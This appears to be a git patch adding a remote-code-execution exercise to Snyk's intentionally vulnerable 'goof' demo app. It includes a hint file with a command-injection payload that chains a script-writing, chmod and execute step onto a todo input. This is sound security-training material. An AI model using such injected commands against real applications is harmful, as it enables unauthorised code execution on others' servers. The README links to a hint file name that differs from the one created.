From a4891ff9c1b6f2951d6107b4feb4a1a44e24e33a Mon Sep 17 00:00:00 2001
From: Dennis Ochocki <dennis.ochocki@tomato-society.de>
Date: Mon, 24 Jun 2019 17:30:58 +0200
Subject: [PATCH] Added a remote code excecution vulnerability for
 snyk-demo-todo_goof

---
 README.md |  7 +++++++
 rce/1.md  | 13 +++++++++++++
 2 files changed, 20 insertions(+)
 create mode 100644 rce/1.md

diff --git a/README.md b/README.md
index 15a31d0..602e423 100644
--- a/README.md
+++ b/README.md
@@ -272,6 +272,13 @@ Back on the snyk project page, find the XSS vulnerability in the ```marked``` pa
 
 After updating your application, try your hacks again. Congratulations, you’ve remediated the XSS vulnerability and shouldn’t be able to embed JavaScript on the web page any longer.
 
+## Remote Code Excecution
+
+If a developer is using exec-commands to execute system tools he has to be sure, that there is no way escaping the command string. 
+Best practice is not using commands like exec.
+
+Click to see [Hint 1](rce/hint1.md).
+
 # Java Goof Installation
 
 To start with, you’ll need to clone the java-goof repository, and build your application. The application can be found on GitHub here: [https://github.com/snyk/java-goof](https://github.com/snyk/java-goof).
diff --git a/rce/1.md b/rce/1.md
new file mode 100644
index 0000000..faf50ef
--- /dev/null
+++ b/rce/1.md
@@ -0,0 +1,13 @@
+Take a look at app.js and find out what is happening, if you create a todo.
+
+Check out the route mapping under routes/index.js.
+
+Find vulnerable exec command.
+
+Just put...
+
+```
+![alt text](https://its-me-dennis.ovh/wp-content/uploads/2019/05/photo504663614128498900.jpg || echo '#!/bin/bash\n#bad stuff happening' > /tmp/extracted_files/exploit.sh && chmod +x /tmp/extracted_files/exploit.sh && /tmp/extracted_files/exploit.sh" hax0r
+```
+
+in the input box an have fun (simply via webbrowser, in my case Chromium 75.0.3770.90).
\ No newline at end of file